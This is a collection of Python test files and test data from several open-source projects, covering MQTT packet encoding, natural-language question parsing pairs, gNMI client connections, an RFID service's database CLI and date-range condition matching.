self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.topics, response.topics)
def test_SUBACK_encdec(self):
request = SUBACK()
response = SUBACK()
request.msgId = 5
request.granted = [(0, False), (0, True), (1,False), (1,True), (2,False), (2,True)]
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.granted, response.granted)
def test_UNSUBSCRIBE_encdec(self):
request = UNSUBSCRIBE()
response = UNSUBSCRIBE()
request.topics = ['foo', 'bar', 'baz']
request.msgId = 6
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.topics, response.topics)
def test_UNSUBACK_encdec(self):
request = UNSUBACK()
response = UNSUBACK()
request.msgId = 5
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBACK_encdec(self):
request = PUBACK()
response = PUBACK()
request.msgId = 65535
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBREC_encdec(self):
request = PUBREC()
response = PUBREC()
request.msgId = 30001
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBREL_encdec(self):
request = PUBREL()
response = PUBREL()
request.msgId = 30002
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBCOMP_encdec(self):
request = PUBCOMP()
response = PUBCOMP()
request.msgId = 30002
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBLISH_encdec(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = None
request.qos = 0
request.dup = False
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_qos(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_dup(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = True
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_retain(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_payload_str(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = ""
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_payload_bytearray(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = bytearray(5)
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload)
class PDUTestCase2(unittest.TestCase):
def test_PUBACK_enc_fail1(self):
request = PUBACK()
request.msgId = -1
self.assertRaises(ValueError, request.encode)
def test_PUBACK_enc_fail2(self):
request = PUBACK()
request.msgId = 2000000
self.assertRaises(ValueError, request.encode)
def test_PUBLISH_encdec_payload_int(self):
request = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = 65537
self.assertRaises(TypeError, request.encode)
def test_PUBLISH_encdec_payload_float(self):
request = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = 12.25
self.assertRaises(TypeError, request.encode)
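Every encode/decode test above repeats the same round-trip shape: build a request, set its fields, decode its encoding into a fresh response, then compare field by field. A minimal self-contained sketch of that pattern — `ToyPDU` and `round_trip` are hypothetical illustrations, not the MQTT classes under test:

```python
import struct

class ToyPDU:
    """Hypothetical fixed-layout packet carrying a single unsigned 16-bit msgId."""
    def __init__(self):
        self.msgId = 0

    def encode(self):
        # Reject out-of-range ids, mirroring the ValueError tests above.
        if not 0 <= self.msgId <= 65535:
            raise ValueError("msgId out of range")
        return struct.pack("!H", self.msgId)

    def decode(self, data):
        (self.msgId,) = struct.unpack("!H", data)

def round_trip(pdu_cls, **fields):
    # Build a request, copy the fields in, then decode its encoding into a fresh response.
    request = pdu_cls()
    for name, value in fields.items():
        setattr(request, name, value)
    response = pdu_cls()
    response.decode(request.encode())
    return request, response

req, res = round_trip(ToyPDU, msgId=30001)
print(req.msgId == res.msgId)  # → True
```

A helper like this would collapse each happy-path test to one call plus its field comparisons.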
# File: src/ro/webdata/oniq/test/dataset/dataset_00.py
# Repo: iliedorobat/semIQ (MIT license)
WHAT_PAIRS = [
{
"query": "What museums and swords are in Bacau?",
"result": """
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##and## what swords,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "What museums are in Bacau or Bucharest?",
"result": """
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##or## in Bucharest
}
"""
},
{
"query": "What museums are in Bacau, Iasi or Bucharest?",
"result": """
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##or## in Iasi
}
statement: {
target phrase: what museums,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##or## in Bucharest
}
"""
}
]
WHAT_IS_PAIRS = [
{
"query": "What is the most beautiful museum?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the most beautiful museum
}
"""
},
{
"query": "What is the name of the largest museum?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the name
}
statement: {
target phrase: the name,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: of the largest museum
}
"""
},
{
"query": "What is the name of the most beautiful museum?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the name
}
statement: {
target phrase: the name,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: of the most beautiful museum
}
"""
},
{
"query": "What is the name of the largest museum which hosts more than 10 pictures and exposed one sword?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the name
}
statement: {
target phrase: the name,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: of the largest museum
}
statement: {
target phrase: of the largest museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: hosts,
modal_vb: None
},
acomp_list: []
},
related phrase: more than 10 pictures
}
statement: {
target phrase: of the largest museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: exposed,
modal_vb: None
},
acomp_list: []
},
related phrase: one sword
}
"""
},
{
"query": "What is the most beautiful place and the largest cave?",
"result": """
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the most beautiful place
}
statement: {
target phrase: what,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## the largest cave
}
"""
}
]
WHICH_PAIRS = [
{
"query": "Which smart kid is famous?",
"result": """
statement: {
target phrase: which smart kid,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [famous]
},
related phrase: famous
}
"""
},
{
"query": "Which of the smart kids are famous?",
"result": """
statement: {
target phrase: which of the smart kids,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: [famous]
},
related phrase: famous
}
"""
},
{
"query": "Which paintings located in Bacau are in good shape?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: located,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: which paintings,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in good shape
}
"""
},
{
"query": "Which paintings, swords or statues are in Bacau?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##or## which swords,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##or## which statues,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "Which museum hosts more than 10 pictures and exposed one sword?",
"result": """
statement: {
target phrase: which museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: hosts,
modal_vb: None
},
acomp_list: []
},
related phrase: more than 10 pictures
}
statement: {
target phrase: which museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: exposed,
modal_vb: None
},
acomp_list: []
},
related phrase: one sword
}
"""
},
{
"query": "Which painting has not been deposited in Bacau?",
"result": """
statement: {
target phrase: which painting,
action: {
neg: not,
verb: {
aux_vbs: [has, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "Which paintings and statues have not been deposited in Bacau?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##and## which statues,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "Which paintings, sharp swords and tall statues have not been deposited in Bacau?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##and## which sharp swords,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
statement: {
target phrase: ##and## which tall statues,
action: {
neg: not,
verb: {
aux_vbs: [have, been],
main_vb: deposited,
modal_vb: None
},
acomp_list: []
},
related phrase: in Bacau
}
"""
},
{
"query": "Which of the most beautiful paintings has not been moved to Bacau?",
"result": """
statement: {
target phrase: which of the most beautiful paintings,
action: {
neg: not,
verb: {
aux_vbs: [has, been],
main_vb: moved,
modal_vb: None
},
acomp_list: []
},
related phrase: to Bacau
}
"""
},
{
"query": "Which one of the most beautiful paintings has not been moved to Bacau?",
"result": """
statement: {
target phrase: which one of the most beautiful paintings,
action: {
neg: not,
verb: {
aux_vbs: [has, been],
main_vb: moved,
modal_vb: None
},
acomp_list: []
},
related phrase: to Bacau
}
"""
},
{
"query": "Which paintings do not have more than three owners?",
"result": """
statement: {
target phrase: which paintings,
action: {
neg: not,
verb: {
aux_vbs: [do, have],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: more than three owners
}
"""
},
{
"query": "Which painting, sharp swords or statues do not have more than three owners?",
"result": """
statement: {
target phrase: which painting,
action: {
neg: not,
verb: {
aux_vbs: [do, have],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: more than three owners
}
statement: {
target phrase: ##or## which sharp swords,
action: {
neg: not,
verb: {
aux_vbs: [do, have],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: more than three owners
}
statement: {
target phrase: ##or## which statues,
action: {
neg: not,
verb: {
aux_vbs: [do, have],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: more than three owners
}
"""
}
]
WHICH_IS_PAIRS = [
{
"query": "Which is the noisiest and the largest city?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the noisiest
}
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## the largest city
}
"""
},
{
"query": "Which is the noisiest and the most beautiful city?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the noisiest
}
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## the most beautiful city
}
"""
},
{
# TODO: the most beautiful
"query": "Which is the noisiest, the most beautiful and the largest city?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful, noisiest]
},
related phrase: the noisiest
}
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful, noisiest]
},
related phrase: ##and## the largest city
}
"""
},
{
# FIXME: "the largest", "the most crowded city"
"query": "Which is the noisiest, the largest and the most crowded city?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the noisiest
}
"""
},
{
"query": "Which is the museum which hosts more than 10 pictures and exposed one sword?",
"result": """
statement: {
target phrase: which,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the museum
}
statement: {
target phrase: the museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: hosts,
modal_vb: None
},
acomp_list: []
},
related phrase: more than 10 pictures
}
statement: {
target phrase: the museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: exposed,
modal_vb: None
},
acomp_list: []
},
related phrase: one sword
}
"""
}
]
WHO_PAIRS = [
{
"query": "Who is very beautiful?",
"result": """
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful]
},
related phrase: beautiful
}
"""
},
{
"query": "Who is very beautiful and very smart?",
"result": """
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful, smart]
},
related phrase: beautiful
}
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: [beautiful, smart]
},
related phrase: ##and## smart
}
"""
},
{
"query": "Who is the most beautiful woman and the most generous person?",
"result": """
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the most beautiful woman
}
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## the most generous person
}
"""
},
{
"query": "Who is the director who own 2 cars and sold a house or a panel?",
"result": """
statement: {
target phrase: who,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the director
}
statement: {
target phrase: the director,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: own,
modal_vb: None
},
acomp_list: []
},
related phrase: 2 cars
}
statement: {
target phrase: the director,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: sold,
modal_vb: None
},
acomp_list: []
},
related phrase: a house
}
statement: {
target phrase: the director,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: sold,
modal_vb: None
},
acomp_list: []
},
related phrase: ##or## a panel
}
"""
}
]
WHOSE_PAIRS = [
{
"query": "Whose picture is it?",
"result": """
statement: {
target phrase: whose picture,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: it
}
"""
}
]
WHEN_PAIRS = [
# {
# # FIXME:
# "query": "When does the museum open?",
# "result": """
#
# """
# }
]
WHERE_PAIRS = [
{
"query": "Where is the museum?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the museum
}
"""
},
{
"query": "Where is the museum located?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [is],
main_vb: located,
modal_vb: None
},
acomp_list: []
},
related phrase: the museum
}
"""
},
{
"query": "Where does the engineer go?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [does],
main_vb: go,
modal_vb: None
},
acomp_list: []
},
related phrase: the engineer
}
"""
},
{
"query": "Where are the coins and swords located?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: located,
modal_vb: None
},
acomp_list: []
},
related phrase: the coins
}
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [are],
main_vb: located,
modal_vb: None
},
acomp_list: []
},
related phrase: ##and## swords
}
"""
},
{
"query": "Where was the last place the picture was exposed?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [was],
main_vb: None,
modal_vb: None
},
acomp_list: []
},
related phrase: the last place
}
statement: {
target phrase: the last place,
action: {
neg: None,
verb: {
aux_vbs: [was],
main_vb: exposed,
modal_vb: None
},
acomp_list: []
},
related phrase: the picture
}
"""
},
{
# TODO: improve the statement structure
"query": "Where does the holder of the position of Lech Kaczynski live?",
"result": """
statement: {
target phrase: where,
action: {
neg: None,
verb: {
aux_vbs: [does],
main_vb: live,
modal_vb: None
},
acomp_list: []
},
related phrase: the holder
}
statement: {
target phrase: the holder,
action: {
neg: None,
verb: {
aux_vbs: [does],
main_vb: live,
modal_vb: None
},
acomp_list: []
},
related phrase: of the position
}
statement: {
target phrase: of the position,
action: {
neg: None,
verb: {
aux_vbs: [does],
main_vb: live,
modal_vb: None
},
acomp_list: []
},
related phrase: of Lech Kaczynski
}
"""
}
]
QUANTITY_QUESTIONS_PAIRS = [
{
"query": "How long does the museum remain closed?",
"result": """
statement: {
target phrase: how long does the museum,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: remain,
modal_vb: None
},
acomp_list: [closed]
},
related phrase: closed
}
"""
},
{
"query": "How many days do I have to wait for him?",
"result": """
statement: {
target phrase: how many days do I,
action: {
neg: None,
verb: {
aux_vbs: None,
main_vb: wait,
modal_vb: None
},
acomp_list: []
},
related phrase: for him
}
"""
}
]
DIRECT_QUESTIONS_PAIRS = [
# {
# # FIXME:
# "query": "Did James work with Andrew?",
# "result": ""
# }
]
PAIRS_00 = WHAT_PAIRS + \
WHAT_IS_PAIRS + \
WHICH_PAIRS + \
WHICH_IS_PAIRS + \
WHO_PAIRS + \
WHOSE_PAIRS + \
WHEN_PAIRS + \
WHERE_PAIRS + \
QUANTITY_QUESTIONS_PAIRS + \
DIRECT_QUESTIONS_PAIRS
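A consumer of these pairs would typically iterate over them and compare the parser's output against each expected result. A hypothetical sketch — `PAIRS`, `check_pairs`, and the `lookup` stub stand in for the real pairs and the real NLP pipeline this dataset targets:

```python
# PAIRS is a hypothetical miniature of the query/result pairs defined above.
PAIRS = [
    {"query": "Where is the museum?", "result": "related phrase: the museum"},
    {"query": "Who is very beautiful?", "result": "acomp_list: [beautiful]"},
]

def check_pairs(pairs, parse):
    # Return the queries whose parsed output does not match the expected result.
    return [p["query"] for p in pairs if parse(p["query"]) != p["result"]]

# A lookup stub stands in for the real parser; it trivially "passes" every pair.
lookup = {p["query"]: p["result"] for p in PAIRS}
print(check_pairs(PAIRS, lookup.get))  # → []
```

Wiring `PAIRS_00` and the actual parser into such a loop would turn the whole dataset into one parametrized regression check.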
#!/usr/bin/env python
# File: tests/test_address_types.py
# Repo: jamie01/pygnmi (BSD-3-Clause license)
# Modules
from pygnmi.client import gNMIclient
from dotenv import load_dotenv
import os
# User-defined functions (Tests)
def test_fqdn_address():
load_dotenv()
username_str = os.getenv("PYGNMI_USER")
password_str = os.getenv("PYGNMI_PASS")
hostname_str = os.getenv("PYGNMI_HOST")
port_str = os.getenv("PYGNMI_PORT")
path_cert_str = os.getenv("PYGNMI_CERT")
gc = gNMIclient(target=(hostname_str, port_str), username=username_str, password=password_str, path_cert=path_cert_str)
gc.connect()
result = gc.capabilities()
gc.close()
assert "supported_models" in result
assert "supported_encodings" in result
assert "gnmi_version" in result
def test_ipv4_address_override():
load_dotenv()
username_str = os.getenv("PYGNMI_USER")
password_str = os.getenv("PYGNMI_PASS")
hostname_str = os.getenv("PYGNMI_HOST_2")
port_str = os.getenv("PYGNMI_PORT")
path_cert_str = os.getenv("PYGNMI_CERT")
gc = gNMIclient(target=(hostname_str, port_str), username=username_str, password=password_str, path_cert=path_cert_str, override="EOS425")
gc.connect()
result = gc.capabilities()
gc.close()
assert "supported_models" in result
assert "supported_encodings" in result
assert "gnmi_version" in result
def test_ipv4_address_certificate_download():
load_dotenv()
username_str = os.getenv("PYGNMI_USER")
password_str = os.getenv("PYGNMI_PASS")
hostname_str = os.getenv("PYGNMI_HOST_2")
port_str = os.getenv("PYGNMI_PORT")
gc = gNMIclient(target=(hostname_str, port_str), username=username_str, password=password_str)
gc.connect()
result = gc.capabilities()
gc.close()
assert "supported_models" in result
assert "supported_encodings" in result
assert "gnmi_version" in result
def test_ipv6_address_override():
load_dotenv()
username_str = os.getenv("PYGNMI_USER")
password_str = os.getenv("PYGNMI_PASS")
hostname_str = os.getenv("PYGNMI_HOST_3")
port_str = os.getenv("PYGNMI_PORT")
path_cert_str = os.getenv("PYGNMI_CERT")
gc = gNMIclient(target=(hostname_str, port_str), username=username_str, password=password_str, path_cert=path_cert_str, override="EOS425")
gc.connect()
result = gc.capabilities()
gc.close()
assert "supported_models" in result
assert "supported_encodings" in result
assert "gnmi_version" in result
# File: tests/python/tests.py
# Repo: PedroCisnerosSantana/sdk-generator (MIT license)
from codeop import CommandCompiler
print("This line will be printed.")
print("This line will be printed.")
# File: tests/cli/test_dbms.py
# Repo: bcurnow/rfid-security-svc (Apache-2.0 license)
from unittest.mock import patch
@patch('rfidsecuritysvc.cli.dbms.dbms')
def test_init_db(dbms, runner, assert_output):
    dbms.init_db.return_value = None
    result = runner.invoke(args=['db', 'init'], input='y')
    assert_output(result, 'Are you sure, this will delete all current data?')
    assert_output(result, 'Initialized the database.')
    dbms.init_db.assert_called_once()


@patch('rfidsecuritysvc.cli.dbms.dbms')
def test_init_db_with_confirm_option(dbms, runner, assert_output):
    dbms.init_db.return_value = None
    result = runner.invoke(args=['db', 'init', '--yes'])
    assert 'Are you sure, this will delete all current data?' not in result.output
    assert_output(result, 'Initialized the database.')
    dbms.init_db.assert_called_once()


@patch('rfidsecuritysvc.cli.dbms.dbms')
def test_init_db_no(dbms, runner, assert_output):
    result = runner.invoke(args=['db', 'init'], input='n')
    assert_output(result, 'Are you sure, this will delete all current data?', 1)
    dbms.init_db.assert_not_called()
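The tests above all rely on the same `unittest.mock.patch` mechanic: the decorator swaps the module-level `dbms` object for a `MagicMock`, which is passed in as the test's first argument. A minimal self-contained sketch of that pattern (the `_Dbms` class and `init_command` helper are hypothetical stand-ins, since the real `rfidsecuritysvc` module is not available here):

```python
from unittest.mock import patch


class _Dbms:
    """Hypothetical stand-in for the real dbms module object."""

    def init_db(self):
        raise RuntimeError("real database touched")


dbms = _Dbms()


def init_command(confirmed):
    # Tiny stand-in for the CLI handler: only initializes when confirmed.
    if not confirmed:
        return "Aborted."
    dbms.init_db()
    return "Initialized the database."


@patch(f"{__name__}.dbms")
def run_demo(mock_dbms):
    # The decorator replaces the module-level `dbms` with a MagicMock for the
    # duration of the call, so init_command never hits the "real" object.
    mock_dbms.init_db.return_value = None
    out = init_command(confirmed=True)
    mock_dbms.init_db.assert_called_once()
    return out
```

Note that the patch target must name the module *using* the object (here, the current module), not where the object was defined.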
# tests/test_daterange.py (Kwpolska/daterange, BSD-3-Clause)
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# datecond test suite
# Copyright © 2016-2021, Chris Warrick.
# See /LICENSE for licensing information.
from datecond import date_in_range
from datetime import date, datetime
from freezegun import freeze_time
def test_single_cond_eq():
pattern = "year == 2016"
assert date_in_range(pattern, datetime(2016, 1, 1))
assert date_in_range(pattern, datetime(2016, 12, 31))
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2015, 1, 1))
assert not date_in_range(pattern, datetime(2015, 5, 5))
def test_single_cond_neq():
pattern = "day != 1"
assert date_in_range(pattern, datetime(2016, 1, 2))
assert date_in_range(pattern, datetime(2015, 1, 2))
assert date_in_range(pattern, datetime(2016, 12, 31))
assert not date_in_range(pattern, datetime(2015, 1, 1))
assert not date_in_range(pattern, datetime(2015, 12, 1))
def test_single_cond_gt():
pattern = "month > 6"
assert not date_in_range(pattern, datetime(2000, 6, 1))
assert date_in_range(pattern, datetime(2000, 7, 1))
assert date_in_range(pattern, datetime(2016, 8, 31))
assert not date_in_range(pattern, datetime(2006, 1, 6))
def test_multiple_cond():
pattern = "year == 2016, month > 6, day != 1"
assert date_in_range(pattern, datetime(2016, 7, 2))
assert date_in_range(pattern, datetime(2016, 12, 31))
assert not date_in_range(pattern, datetime(2015, 7, 2))
assert not date_in_range(pattern, datetime(2016, 6, 2))
assert not date_in_range(pattern, datetime(2016, 7, 1))
assert not date_in_range(pattern, datetime(2015, 6, 1))
def test_exact_date():
pattern = "<= 2016-07-13"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert date_in_range(pattern, datetime(2016, 7, 12))
assert not date_in_range(pattern, datetime(2016, 7, 14))
assert not date_in_range(pattern, datetime(2016, 8, 13))
assert date_in_range(pattern, datetime(2010, 1, 1))
assert not date_in_range(pattern, datetime(2017, 1, 1))
def test_weekday_isoweekday():
pattern = "weekday == 2"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14))
pattern = "weekday != 0"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 11))
pattern = "isoweekday == 3"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14))
pattern = "isoweekday != 1"
assert date_in_range(pattern, datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 11))
def test_now_lt():
pattern = "< now"
assert date_in_range(pattern, datetime(2016, 7, 13), now=datetime(2016, 7, 14))
assert not date_in_range(pattern, datetime(2016, 7, 14), now=datetime(2016, 7, 14))
def test_now_today():
pattern = "== now"
assert date_in_range(pattern, datetime(2016, 7, 13), now=datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 13, 1), now=datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14), now=datetime(2016, 7, 13))
pattern = "== today"
assert date_in_range(pattern, datetime(2016, 7, 13), now=datetime(2016, 7, 13))
assert date_in_range(pattern, datetime(2016, 7, 13, 1), now=datetime(2016, 7, 13))
assert not date_in_range(pattern, datetime(2016, 7, 14), now=datetime(2016, 7, 13))
def test_today_date_datetime():
pattern = "== today"
assert date_in_range(pattern, date(2016, 7, 13), now=date(2016, 7, 13))
assert not date_in_range(pattern, date(2016, 7, 14), now=date(2016, 7, 13))
assert date_in_range(pattern, date(2016, 7, 13), now=datetime(2016, 7, 13))
assert not date_in_range(pattern, date(2016, 7, 14), now=datetime(2016, 7, 13))
assert date_in_range(pattern, datetime(2016, 7, 13), now=date(2016, 7, 13))
